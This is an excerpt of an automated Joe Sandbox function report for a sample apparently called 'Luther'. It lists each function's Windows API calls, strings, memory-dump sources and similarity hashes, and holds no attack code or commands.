API String ID: 3076010158-4108050209
Opcode ID: 18483c1eb12b1d1af2c1fc781c275aeb7cd04e9d0e5e72030a8049ae88ae39c7
Instruction ID: 8c452e71056683e6d2b78baec7151c922de19e44e664cf537be0707424f3605e
Opcode Fuzzy Hash: 18483c1eb12b1d1af2c1fc781c275aeb7cd04e9d0e5e72030a8049ae88ae39c7
Instruction Fuzzy Hash: B9416AB5A0025AEFDB10CF51D994EAABBB5FF46328F04502DFD45A7290C332AD46DB60

Function 00E9272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333

Part of subcall function 00E945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E94620

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E927B3
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E927C6
SendMessageW.USER32(?,00000189,?,00000000), ref: 00E927F6

Part of subcall function 00E38577: _wcslen.LIBCMT ref: 00E3858A

Strings

ComboBox, xrefs: 00E9273D
ListBox, xrefs: 00E92772

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 9c3d1ccf00d17d2d7df1cc6448915c838d6a4075175f63d1109fa7851db5a0c1
Instruction ID: a94bdea0ac4846a14a2dac20d21b3ff71fb471a7eda9eefb3e5126dc3f31d355
Opcode Fuzzy Hash: 9c3d1ccf00d17d2d7df1cc6448915c838d6a4075175f63d1109fa7851db5a0c1
Instruction Fuzzy Hash: 7C21B471900104BFDF19ABA4DC49DFEBBB8DF453A4F10612AF912B71E1CB75490ADA50

Function 00EC39B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00EC3A29
LoadLibraryW.KERNEL32(?), ref: 00EC3A30
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00EC3A45
DestroyWindow.USER32(?), ref: 00EC3A4D

Strings

SysAnimate32, xrefs: 00EC3A04

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 3fe25ff5e07e1a99479449641f6ffd23fe0b2d58b5d7c9f16a50ee361e547567
Instruction ID: 63087839610b5cfe504dfc7effe0a5d6b7bb88d8443c08833709476566240cae
Opcode Fuzzy Hash: 3fe25ff5e07e1a99479449641f6ffd23fe0b2d58b5d7c9f16a50ee361e547567
Instruction Fuzzy Hash: 21219F71600609AFEB109F74DD84FBB77E9EB85368F10A229FA91A2190C772CD529760

Function 00E550DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00E5508E,?,?,00E5502E,?,00EF98D8,0000000C,00E55185,?,00000002), ref: 00E550FD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E55110
FreeLibrary.KERNEL32(00000000,?,?,?,00E5508E,?,?,00E5502E,?,00EF98D8,0000000C,00E55185,?,00000002,00000000), ref: 00E55133

Strings

CorExitProcess, xrefs: 00E55108
mscoree.dll, xrefs: 00E550F6

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: d135dc4f60faf728076c1c10f82def990b41e9668c9f19446470be10ff76b5a4
Instruction ID: 5e7b6a311c756af5e9d19e057929359d9681faf62e6b0763030c1d8c3b493476
Opcode Fuzzy Hash: d135dc4f60faf728076c1c10f82def990b41e9668c9f19446470be10ff76b5a4
Instruction Fuzzy Hash: 1FF0A431A05608BFDB105F95DC09FADBFB5EF04716F040075F809B2160CB325949CB90

Function 00E3663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E3668B,?,?,00E362FA,?,00000001,?,?,00000000), ref: 00E3664A
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E3665C
FreeLibrary.KERNEL32(00000000,?,?,00E3668B,?,?,00E362FA,?,00000001,?,?,00000000), ref: 00E3666E

Strings

kernel32.dll, xrefs: 00E36642
Wow64DisableWow64FsRedirection, xrefs: 00E36656

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 80900435b05839431cd6ae0e8d1ff80be947fde71432cbf0db201b9ba6825c1b
Instruction ID: 2f35a66ac59adfd7f21292aff185765927a31285da7554438b9b89cd985cd0d1
Opcode Fuzzy Hash: 80900435b05839431cd6ae0e8d1ff80be947fde71432cbf0db201b9ba6825c1b
Instruction Fuzzy Hash: D4E086356066222B92112736BC0DF6AA9289F82B56F095135F905F2140DB53CD07C0B4

Function 00E36607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E75657,?,?,00E362FA,?,00000001,?,?,00000000), ref: 00E36610
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E36622
FreeLibrary.KERNEL32(00000000,?,?,00E75657,?,?,00E362FA,?,00000001,?,?,00000000), ref: 00E36635

Strings

kernel32.dll, xrefs: 00E36609
Wow64RevertWow64FsRedirection, xrefs: 00E3661C

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: b811f7b7a10f114e6021f93dfeb397ff419e290fa552740a72bc8f70a0b159be
Instruction ID: d3ec55371dfdb83d2200acc7474a5e4be0541e685bd051706b415c22db4f179d
Opcode Fuzzy Hash: b811f7b7a10f114e6021f93dfeb397ff419e290fa552740a72bc8f70a0b159be
Instruction Fuzzy Hash: 4CD01235617A316B422227366C1DEDFAE249F91B553195039B904B2174CF63CD17C5D8

Function 00EA3306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EA35C4
DeleteFileW.KERNEL32(?), ref: 00EA3646
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00EA365C
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EA366D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EA367F

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: ced6211b38d86543e3f5195118871eca8a0e29217bf0116ab7a49aa16992e569
Instruction ID: 0ece32719275be25095e162a903e002126712ca611215cec8b1f7afeaa3c35b1
Opcode Fuzzy Hash: ced6211b38d86543e3f5195118871eca8a0e29217bf0116ab7a49aa16992e569
Instruction Fuzzy Hash: 18B17E72E00119AFDF15DBA4CC85EDEBBBDEF49314F0054A6F609BA151EA30AB44CB61

Function 00EBADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00EBAE87
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EBAE95
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00EBAEC8
CloseHandle.KERNEL32(?), ref: 00EBB09D

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 582a02a469e9c2b73653379d5b246b01ccafea80236a876d6ed898b4004af9e7
Instruction ID: 88d5f2fec6c49445dc436eca779514205f23c744068c62a27c94468aea58deef
Opcode Fuzzy Hash: 582a02a469e9c2b73653379d5b246b01ccafea80236a876d6ed898b4004af9e7
Instruction Fuzzy Hash: 44A19FB1A043019FE720DF24C886B6AB7E5AF44714F14986CF5A9AB3D2C7B1EC41CB81

Function 00EBC429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333

Part of subcall function 00EBD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EBC10E,?,?), ref: 00EBD415
Part of subcall function 00EBD3F8: _wcslen.LIBCMT ref: 00EBD451
Part of subcall function 00EBD3F8: _wcslen.LIBCMT ref: 00EBD4C8
Part of subcall function 00EBD3F8: _wcslen.LIBCMT ref: 00EBD4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EBC505
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EBC560
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00EBC5C3
RegCloseKey.ADVAPI32(?,?), ref: 00EBC606
RegCloseKey.ADVAPI32(00000000), ref: 00EBC613

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 4c58b2ac475481f42d1e818f3adc4cfdc5461ccc69d637daa2241a0a0ddfe72c
Instruction ID: 280612d9b685928b559e79f53890b633639a00374fd8ebb7938f5ca809205690
Opcode Fuzzy Hash: 4c58b2ac475481f42d1e818f3adc4cfdc5461ccc69d637daa2241a0a0ddfe72c
Instruction Fuzzy Hash: B761B631209241AFC714DF14C895EA7BBE5FF84308F54A56CF09A6B292DB31ED46CB91

Function 00E9ED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E9E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E9D7CD,?), ref: 00E9E714

Part of subcall function 00E9E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E9D7CD,?), ref: 00E9E72D

Part of subcall function 00E9EAB0: GetFileAttributesW.KERNEL32(?,00E9D840), ref: 00E9EAB1

lstrcmpiW.KERNEL32(?,?), ref: 00E9ED8A
MoveFileW.KERNEL32(?,?), ref: 00E9EDC3
_wcslen.LIBCMT ref: 00E9EF02
_wcslen.LIBCMT ref: 00E9EF1A
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00E9EF67

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: e9726c498895593a69360ed98b3b75c36450d766eb70b5665119c5c41b23de78
Instruction ID: 6aab733f412fc1b2e6c06977ca711aa6fae4686e63d9a1d414c36d1b03c1ccdc
Opcode Fuzzy Hash: e9726c498895593a69360ed98b3b75c36450d766eb70b5665119c5c41b23de78
Instruction Fuzzy Hash: EF5165B25083859BCB24EB54DC919DBB3DCEF84304F40192EF689E3151EF71A588C756

Function 00E99517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E99534
VariantClear.OLEAUT32 ref: 00E995A5
VariantClear.OLEAUT32 ref: 00E99604
VariantClear.OLEAUT32(?), ref: 00E99677
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E996A2

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 2cef8573adb0891bb4833efa7c273d37786b2ca86b8507cb9585e839f0c9cc0d
Instruction ID: 5f55a683c322a34d13673ef4a2ac997cc4fee246e92d50bf8d741e6d8dedf321
Opcode Fuzzy Hash: 2cef8573adb0891bb4833efa7c273d37786b2ca86b8507cb9585e839f0c9cc0d
Instruction Fuzzy Hash: A2514AB5A006199FCB14CF58C884EAAB7F8FF88314B15856DE916EB311E730E911CB90

Function 00EA9540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00EA95F3
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00EA961F
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00EA9677
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00EA969C
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EA96A4

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: cefcf672fe4e77d36ade00c940f16ea8edd762fa2eddd10e6d605bec53529193
Instruction ID: 9feaabe1e763241b982cbe89767a6523371324b9b04e8f36c85e1514afdea29a
Opcode Fuzzy Hash: cefcf672fe4e77d36ade00c940f16ea8edd762fa2eddd10e6d605bec53529193
Instruction Fuzzy Hash: A0514935A00614AFCB05DF65C985AAABBF5FF49314F048468E809AB3A2CB31FD41CB90

Function 00EB9941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00EB999D
GetProcAddress.KERNEL32(00000000,?), ref: 00EB9A2D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00EB9A49
GetProcAddress.KERNEL32(00000000,?), ref: 00EB9A8F
FreeLibrary.KERNEL32(00000000), ref: 00EB9AAF

Part of subcall function 00E4F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00EA1A02,?,7529E610), ref: 00E4F9F1
Part of subcall function 00E4F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00E90354,00000000,00000000,?,?,00EA1A02,?,7529E610,?,00E90354), ref: 00E4FA18

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: d3b8df14e1ad8f77ccef97b52493ff8b7be4c306a0f4cc7b7dd4e27e682497db
Instruction ID: 31e9297f8683ddf6edee6d047a4b0bdd065edc52cff3cb9248d310c5be1ca680
Opcode Fuzzy Hash: d3b8df14e1ad8f77ccef97b52493ff8b7be4c306a0f4cc7b7dd4e27e682497db
Instruction Fuzzy Hash: 45513C35605205DFC701DF68C4859EABBF0FF49318B1591A8E90ABB362D731ED86CB81

Function 00EC75AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00EC766B
SetWindowLongW.USER32(?,000000EC,?), ref: 00EC7682
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00EC76AB
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00EAB5BE,00000000,00000000), ref: 00EC76D0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00EC76FF

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 0301ddc499aabd48103e53209960d43428272f3c856c99489b5d091b8f873c3e
Instruction ID: c3d43d6166c34949065ad94ccc69a990f82a90ae5b9175a4d7ed7d8811791dfc
Opcode Fuzzy Hash: 0301ddc499aabd48103e53209960d43428272f3c856c99489b5d091b8f873c3e
Instruction Fuzzy Hash: A541B035A08504AFD7258F2CCE48FAA7BA5EB09354F151268E899B72A0C672ED42DE50

Function 00E623C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00E62433
_free.LIBCMT ref: 00E62453

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 741db2755c65c174d48a3df4eb4bcf89828114732c3616fffa70dbbdf9a194a3
Instruction ID: 87e6fa3ec67e10c9546fff86031abfcfea2bf030d01271c6bc0d408808a6551e
Opcode Fuzzy Hash: 741db2755c65c174d48a3df4eb4bcf89828114732c3616fffa70dbbdf9a194a3
Instruction Fuzzy Hash: 9841B032A40A109FCB20DF78D881A69B7E6EF89354B1555ACEA15FB391DA31AD01CB81

Function 00EA42B9 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00EA4310
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00EA4367
TranslateMessage.USER32(?), ref: 00EA4390
DispatchMessageW.USER32(?), ref: 00EA439A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EA43AB

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 3a8d189dbc5387362cbbb89d9b937a8267e3178acd92c8214746e87ae34021f7
Instruction ID: a65f47800b5431a6269d8b1bf058545816d042ad746841b4795fb4a8556580e6
Opcode Fuzzy Hash: 3a8d189dbc5387362cbbb89d9b937a8267e3178acd92c8214746e87ae34021f7
Instruction Fuzzy Hash: 1C31A5B0504345DEEF25CB24DC4DBB63BE8BB8A308F045569D462AA1E0E3F5B84DDB21

Function 00E9224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00E92262
PostMessageW.USER32(00000001,00000201,00000001), ref: 00E9230E
Sleep.KERNEL32(00000000,?,?,?), ref: 00E92316
PostMessageW.USER32(00000001,00000202,00000000), ref: 00E92327
Sleep.KERNEL32(00000000,?,?,?,?), ref: 00E9232F

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
